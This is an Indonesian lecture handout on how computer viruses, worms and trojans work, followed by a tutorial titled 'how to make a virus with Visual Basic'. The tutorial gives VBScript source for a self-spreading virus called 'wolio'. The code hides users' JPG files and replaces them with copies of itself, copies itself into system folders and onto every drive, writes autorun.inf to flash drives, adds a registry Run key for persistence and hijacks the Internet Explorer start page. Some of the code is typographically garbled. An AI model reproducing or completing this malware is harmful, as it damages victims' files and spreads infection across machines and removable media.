PERTEMUAN 10 CARA KERJA VIRUS, WORM, DAN TROJAN

Cara Kerja Virus Komputer Menurut Jenisnya Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak system komputer. Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,Berikut Jenis-jenis virus dan cara kerja masing-masing virus :

1. Virus File Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.Saat aplikasi yangterinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.

2. Virus Boot Sector Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan). Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.

3. Virus E-mail Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat. Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam bukualamat pengguna.

4. Virus Multipartite Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk. Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.

5. Virus Polimorfis Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain. Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu.

6. Virus Siluman (stealth virus) Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.

7. Virus Makro

Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel. Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk

menyebarkan dirinya saat perintah tersebut dijalankan. Worm Worm adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer. Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru. Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistemkomputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna. Beberapa contoh dari worm adalah sebagai berikut: · ADMw0rm: Worm yang dapat melakukan ekspolitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), denganmelakukan buffer-overflow. · Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan bufferoverflow. · LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript). · Nimda · SQL-Slammer

Cara Kerja Trojan Trojan masuk melalui dua bagian, yaitu bagian client dan server. Ketika korban (tanpa diketahui) menjalankan komputer, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi. Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri disuatu tempat dalam sistem computer tersebut, kemudian mulai “mendengarkan” di beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting. Hal yang penting untuk diketahui oleh penyerang adalah mengetahui IP address korban untuk menghubungkan komputernya ke komputer korban. Banyak varian Trojan mempunyai kemampuan mengirimkan IP address korban ke penyerangnya, misalnya media ICQ maupun IRC. Hal ini digunakan bagi korban yang mempunyai IP address dinamis, yang berarti setiap kali menghubungkan ke Internet didapatkan IP address yang berbeda. Untuk pemakai yang memanfaatkan Asymmetric Digital Suscriber Line (ADSL) berarti selalu memakai IP address yang tetap (statis) sehingga mudah diketahui dan mudah untuk dikoneksikan dengan komputer penyerang.

Cara Membuat Virus Menggunakan Visual Basic (VB)

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:

1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.

2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows

3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart

4. Menularkan diri pada drive-drive yang aktif termasuk flash disk

5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer

Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:

1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas

Sub serangan_jpg(target) on error resume next set ftarget=fso.GetFile(target) set fsource = fso.GetFile(Wscript.ScriptFullName) ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”) set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”) fbackup.Attributes = 2 fsou rce.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”) ftarget.Delete ftarget.Close fsource.Close End Sub Sub carifilejpg(folder) For Each filetarget in fso.GetFolder(folder).Files If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget) Next End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.

Sub serangan_drive() Set fso = CreateObject(”Scripting.FileSystemObject”) Set Drives=fso.drives adaflashdisk = False For Each drive in Drives If drive.isready Then fsource.Copy(drive & “” & “wolio.vbs”) If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True End If Next If adaflashdisk = True Then set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False) fileautorun.WriteLine(”[AUTORUN]“) fileautorun.WriteLine(”RUN=wolio.vbs”)

End If End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan

Sub serangan_ie() If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start Page”)<>”c:\windows\system32\wolio.html”) Then regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page”,”c:\windows\system32\wolio.html” End If End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus

Sub buat_html() set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True) filehtml.WriteLine(””) filehtml.WriteLine(””) “) filehtml.WriteLine(”Welcome to Wolio”) filehtml.Writ eLine(”filehtml.WriteLine(””) filehtml.WriteLine(””) filehtml.WriteLine(””) filehtml.WriteLine(””) filehtml.WriteLine(””) filehtml.WriteLine(”Selamat Datang di Wolio VBS “) filehtml.WriteLine(””) filehtml.WriteLine(””) End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus

Sub serangan_folder(foldername) on error resume next For Each subfolder in fso.GetFolder(foldername).SubFolders fsource.Copy(subfolder & “wolio.vbs”) carifilejpg(subfolder) next End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur

On Error Resume Next dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive, filehtml, fileautorun dim adaflashdisk set fso = CreateObject(”Scripting.FileSystemObject”) set fsource = fso.GetFile(Wscript.ScriptFullName) set regedit=CreateObject(”WScript.Shell”) myfolder = Left(fsource,InStrRev(fsource,””)) „ Copy-kan diri ke “c:windowssystem32″ fsourc e.Copy(”c:windowssystem32wolio.vbs”) „ Cari dan infeksi file JPG didalam folder carifilejpg(myfolder) „ Copy-kan diri di sub folder yang ada serangan_folder(myfolder) „ Regitry if (regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current \Version\Run\ Wolio”)<>”c:\windows\system32\wolio.vbs”) Then regedit.RegWrite “HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio ”,”c:\windows\system32\wolio.vbs” End If „ Copy-kan diri ke semua drive aktif serangan_drive() „ Buat file wolio.html buat_html() „ Ubah Start Page di Internet Explorer

serangan_ie()